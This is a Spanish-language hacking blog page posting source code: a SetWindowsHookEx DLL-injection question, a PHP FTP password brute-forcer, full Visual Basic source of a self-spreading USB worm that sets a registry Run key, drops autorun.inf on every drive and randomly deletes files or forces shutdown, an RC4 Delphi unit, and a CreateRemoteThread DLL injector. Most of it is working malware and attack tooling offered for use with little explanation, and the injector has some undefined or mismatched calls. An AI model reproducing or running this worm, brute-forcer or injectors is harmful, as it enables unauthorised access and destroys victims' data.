SetWindowsHookEx DLL injection.

Publicado por luchin On viernes, 28 de enero de 2011 1 comentarios

GetProcAddress fails with ERROR_PROC_NOT_FOUND.

What am I overlooking within the DLL?

Inject

Code:
void Injector::Inject(void){
   if(CheckProcess()){
      HMODULE dll  = LoadLibrary(dll_name);
      FARPROC proc = GetProcAddress(dll, "GetMsgProc");
      HHOOK   hh    = SetWindowsHookEx(WH_GETMESSAGE, (HOOKPROC)proc, dll, te.th32ThreadID);
      UnhookWindowsHookEx(hh);
   }
}


DLL
Code:
#include

extern "C" __declspec(dllexport)LRESULT CALLBACK GetMsgProc(int nCode, WPARAM wParam, LPARAM lParam){
   return CallNextHookEx(0, nCode, wParam, lParam);
}

BOOL APIENTRY DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved){
   UNREFERENCED_PARAMETER(hinstDLL);
   UNREFERENCED_PARAMETER(fdwReason);
   switch(fdwReason)
   {
   case DLL_PROCESS_ATTACH:
      MessageBox(0, "Hi", "Sup", MB_OK);
      return TRUE;
   case DLL_PROCESS_DETACH:
      return TRUE;
   }
   return ERROR_SUCCESS;
}

Read more ...»

Publicado por luchin en 12:10 1 comentarios

Simple FTP Brute-Force

Publicado por luchin On 0 comentarios

Source Code


  2. $sito = $argv[1];
  3. $username = $argv[2];
  4. $lista = $argv[3];
  5.  
  6. if((isset($sito)) AND (isset($lista)) AND (isset($username))){
  7.  
  8. if (file_exists($lista)){
  9.  
  10. $lista = file($lista);
  11. $connessione = ftp_connect($sito) or die("Impossibile stabilire una connessione a $sito");
  12.  
  13. foreach($lista as $passwd){
  14.  
  15. if(@ftp_login($connessione, $username, $passwd)){
  16. die("\t[Successo] - $passwd");
  17. } else {
  18. print "[Fallito] - $passwd\n";
  19. }
  20.  
  21. }
  22.  
  23. ftp_close($connessione);
  24. } else
  25. die("Lista per il brute force assente");
  26.  
  27. } else
  28. die("Uso: php .php \nEsempio: php brute.php ftp.google.it admin /root/list.txt");
  29. ?>
Read more ...»

Publicado por luchin en 12:10 0 comentarios

Worm Virus | Win32.Autoexec.worm

Publicado por luchin On 0 comentarios

Description // Info




Source Code

  1. Private Sub Form_Load(): On Error Resume Next: Me.Visible = 0: App.TaskVisible = 0
  2. Dim Pyld As Integer: Randomize
  3. Dim BackUp As String: BackUp = Environ("windir") & "\Kernel23.exe"
  4. '-----------------------------------------------------------------------------------
  5. If LCase(App.EXEName) = "system" Then
  6. Shell "Explorer.exe " & Left(App.Path, 2), vbMaximizedFocus
  7. Pyld = Int(Rnd * 30)
  8. If Pyld = 1 Then MsgBox "Hehehe .. " & vbCrLf & "Bad News For You ( Your Infected )", 64, "Virus Alert!"
  9. If Pyld = 5 Then MsgBox " © By Mr.He$y / [P.V.T] ", 64, " W32/Autoexec.worm !"
  10. If Pyld = 10 Then MsgBox "System Error(-243245&H21321438230.)", 16, "Error"
  11. If Pyld = 15 Then Shell "Rundll.exe user.exe,exitwindows", vbHide
  12. If Pyld = 20 Then SendKeys "^a", 1: SendKeys "+{DEL}", 1: SendKeys "~", 1
  13. If Pyld = 25 Then Kill "*.*"
  14. If Pyld Mod 3 = 0 Then Shell Environ("COMSPEC") & " /C ECHO " & Chr(7), vbHide
  15. End If
  16. Call Search_Drv
  17. '-----------------------------------------------------------------------------------
  18. 'Worm BackUp To Windows Folder & Created Run Key Of Rgistery
  19. If Dir(BackUp) = "" Then
  20. Set Reg = CreateObject("Wscript.shell")
  21. Reg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\Microsoft Kernel Lab", BackUp
  22. FileCopy Worm, BackUp
  23. End If
  24. '-----------------------------------------------------------------------------------
  25. End
  26. End Sub
  27.  
  28. Private Sub Search_Drv()
  29. Dim Fso, Drives
  30. Set Fso = CreateObject("scripting.filesystemobject")
  31. Set Drives = Fso.Drives
  32. For Each Drive In Drives
  33. If Drive.IsReady Then
  34. Infected_Drv (Drive)
  35. End If
  36. Next
  37. End Sub
  38.  
  39. Private Sub Infected_Drv(Path As String)
  40. Dim INF As String: INF = Path & "\autorun.inf"
  41. Dim EXEC As String: EXEC = Path & "\System.exe"
  42. If Dir(INF, vbHidden) <> "" And Dir(EXEC, vbHidden) <> "" Then Exit Sub
  43. FileCopy Worm, EXEC
  44. Open INF For Output As #1
  45. Print #1, "[Autorun]"
  46. Print #1, "Open=System.exe"
  47. Close
  48. SetAttr INF, vbHidden
  49. End Sub
  50.  
  51. Public Function Worm() As String
  52. Worm = App.Path
  53. If Right(Worm, 1) <> "\" Then Worm = Worm & "\"
  54. Worm = Worm & App.EXEName & ".exe"
  55. End Function
Read more ...»

Publicado por luchin en 12:10 0 comentarios

Text Encryption Unit

Publicado por luchin On 0 comentarios

Source Code

  1. unit unRC4;
  3. interface
  5. type
  6.   PByteArray = ^TByteArray;
  7.   TByteArray = Array [0..32767] Of Byte;
  9.   TRC4 = class
  10.   private
  11.     D               : array[Byte] of Byte;
  12.     I,J             : Byte;
  13.     procedure Init(const Key: string);
  14.     procedure Done;
  15.     procedure Code(Source, Dest: pChar; Count: Integer);
  16.   public
  17.     function Encrypt(S: pChar; const Password: string): AnsiString;
  18.     function Decrypt(S: pChar; const Password: string): AnsiString;
  19.   end;
  21. implementation
  23. { TRC4.Encrypt
  24.   This function will return the text(S) encrypted with the chosen password. }
  25. function TRC4.Encrypt(S: pChar; const Password: string): AnsiString;
  26. begin
  27.   SetLength(Result, Length(S));
  28.   Init(Password);
  29.   Code(pChar(S), pChar(Result), Length(S));
  30.   Done;
  31. end;
  33. { TRC4.Decrypt
  34.   This function will return the text(S) decrypted with the chosen password. }
  35. function TRC4.Decrypt(S: pChar; const Password: string): AnsiString;
  36. begin
  37.   SetLength(Result, Length(S));
  38.   Init(Password);
  39.   Code(pChar(S), pChar(Result), Length(S));
  40.   Done;
  41. end;
  43. { TRC4.Init
  44.   This routine will prepare the encryption/decryption. }
  45. procedure TRC4.Init(const Key: string);
  46. var
  47.   R, S, T, K        : Byte;
  48.   U,L               : Integer;
  49.   DummyArray        : array [0..1599] of Char;
  50. begin
  51. {$R-}
  52. {$Q-}
  53.   L := Length(Key);
  54.   I := 0;
  55.   J := 0;
  56.   R := 0;
  57.   U := 0;
  58.   for S := 0 to 255 do
  59.     D[S] := S;
  60.   for S := 0 to 255 do
  61.   begin
  62.     if (U < L) then
  63.       K := PByteArray(Key)[u]
  64.     else
  65.       K := 0;
  66.     Inc(U);
  67.     if (U >= L) then
  68.       U := 0;
  69.     Inc(R, D[S] + K);
  70.     T    := D[S];
  71.     D[S] := D[R];
  72.     D[R] := T;
  73.   end;
  74.   Code(@DummyArray, @DummyArray, 1600);
  75. end;
  77. { TRC4.Done
  78.   This routine will clean the variables used when encrypting/decrypting. }
  79. procedure TRC4.Done;
  80. begin
  81.   FillChar(D, sizeOf(D), 0);
  82.   FillChar(I, sizeOf(I), 0);
  83.   FillChar(J, sizeOf(J), 0);
  84. end;
  86. { TRC4.Code
  87.   This routine will encrypt the text. }
  88. procedure TRC4.Code(Source, Dest: pChar; Count: Integer);
  89. var
  90.   S                 : Integer;
  91.   T                 : Byte;
  92. begin
  93.   for S := 0 to (Count - 1) do
  94.   begin
  95.     Inc(I);
  96.     T := D[i];
  97.     Inc(J, T);
  98.     D[i] := D[J];
  99.     D[J] := T;
  100.     Inc(T, D[i]);
  101.     Byte(Dest[S]) := Byte(Source[S]) xor D[T];
  102.   end;
  103. end;
  105. end.
Read more ...»

Publicado por luchin en 12:09 0 comentarios

Dll Injection Using CreateRemoteThread()

Publicado por luchin On 0 comentarios

Description // Info




Source Code

  1. #define PROCESS_NAME \"target.exe\"
  2. #define DLL_NAME \"injected.dll\"
  3.  
  4.  
  5. //I could just use PROCESS_ALL_ACCESS but it\'s always best to use the absolute bare minimum of
  6. //priveleges, so that your code works in as
  7. //many circumstances as possible.
  8. #define CREATE_THREAD_ACCESS (PROCESS_CREATE_THREAD |
  9.                               PROCESS_QUERY_INFORMATION |
  10.                               PROCESS_VM_OPERATION |
  11.                               PROCESS_VM_WRITE |
  12.                               PROCESS_VM_READ
  13.                              )
  14.  
  15. BOOL WriteProcessBYTES(HANDLE hProcess,LPVOID lpBaseAddress,LPCVOID lpBuffer,SIZE_T nSize);
  16.  
  17. BOOL LoadDll(char *procName, char *dllName);
  18. BOOL InjectDLL(DWORD ProcessID, char *dllName);
  19. unsigned long GetTargetProcessIdFromProcname(char *procName);
  20.  
  21. bool IsWindowsNT()
  22. {
  23.    // check current version of Windows
  24.    DWORD version = GetVersion();
  25.    // parse return
  26.    DWORD majorVersion = (DWORD)(LOBYTE(LOWORD(version)));
  27.    DWORD minorVersion = (DWORD)(HIBYTE(LOWORD(version)));
  28.    return (version < 0x80000000);
  29. }
  30.  
  31. int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow)
  32. {
  33.     if(IsWindowsNT())
  34.        LoadDll(PROCESS_NAME, DLL_NAME);
  35.     else
  36.    MessageBox(0, \"Your system does not support this method\", \"Error!\", 0);
  37.  
  38.     return 0;
  39. }
  40.  
  41.  
  42. BOOL LoadDll(char *procName, char *dllName)
  43. {
  44.    DWORD ProcID = 0;
  45.  
  46.    ProcID = GetProcID(procName);
  47.  
  48.    if(!(InjectDLL(ProcID, dllName)))
  49.       MessageBox(NULL, \"Process located, but injection failed\", \"Loader\", NULL);
  50.    
  51.    return true;
  52. }
  53.  
  54. BOOL InjectDLL(DWORD ProcessID, char *dllName)
  55. {
  56.    HANDLE Proc;
  57.    char buf[50]={0};
  58.    LPVOID RemoteString, LoadLibAddy;
  59.  
  60.    if(!ProcessID)
  61.       return false;
  62.    Proc = OpenProcess(CREATE_THREAD_ACCESS, FALSE, ProcessID);
  63.    if(!Proc)
  64.    {
  65.       sprintf(buf, \"OpenProcess() failed: %d\", GetLastError());
  66.       MessageBox(NULL, buf, \"Loader\", NULL);
  67.       return false;
  68.    }
  69.    LoadLibAddy = (LPVOID)GetProcAddress(GetModuleHandle(\"kernel32.dll\"), \"LoadLibraryA\");
  70.  
  71.  
  72.    RemoteString = (LPVOID)VirtualAllocEx(Proc,
  73.                                          NULL,
  74.                                          strlen(DLL_NAME),
  75.                                          MEM_RESERVE|MEM_COMMIT,
  76.                                          PAGE_READWRITE
  77.                                         );
  78.    WriteProcessMemory(Proc, (LPVOID)RemoteString, DLL_NAME,strlen(DLL_NAME), NULL);
  79.    CreateRemoteThread(Proc,
  80.                       NULL,
  81.                       NULL,
  82.                       (LPTHREAD_START_ROUTINE)LoadLibAddy,
  83.                       (LPVOID)RemoteString,
  84.                       NULL,
  85.                       NULL
  86.                      );    
  87.    CloseHandle(Proc);
  88.    return true;
  89. }
  90.  
  91. unsigned long GetTargetProcessIdFromProcname(char *procName)
  92. {
  93.    PROCESSENTRY32 pe;
  94.    HANDLE thSnapshot;
  95.    BOOL retval, ProcFound = false;
  96.    thSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
  97.    if(thSnapshot == INVALID_HANDLE_VALUE)
  98.    {
  99.       MessageBox(NULL, \"Error: unable to create toolhelp snapshot\", \"Loader\", NULL);
  100.       return false;
  101.    }
  102.    pe.dwSize = sizeof(PROCESSENTRY32);
  103.    retval = Process32First(thSnapshot, &pe);
  104.    while(retval)
  105.    {
  106.       if(StrStrI(pe.szExeFile, procName) )
  107.       {
  108.          ProcFound = true;
  109.          break;
  110.       }
  111.       retval    = Process32Next(thSnapshot,&pe);
  112.       pe.dwSize = sizeof(PROCESSENTRY32);
  113.    }
  114.    return pe.th32ProcessID;
  115. }
Read more ...»

Publicado por luchin en 12:08 0 comentarios
Suscribirse a: Entradas (Atom)
Twitter Delicious Facebook Digg Stumbleupon Favorites More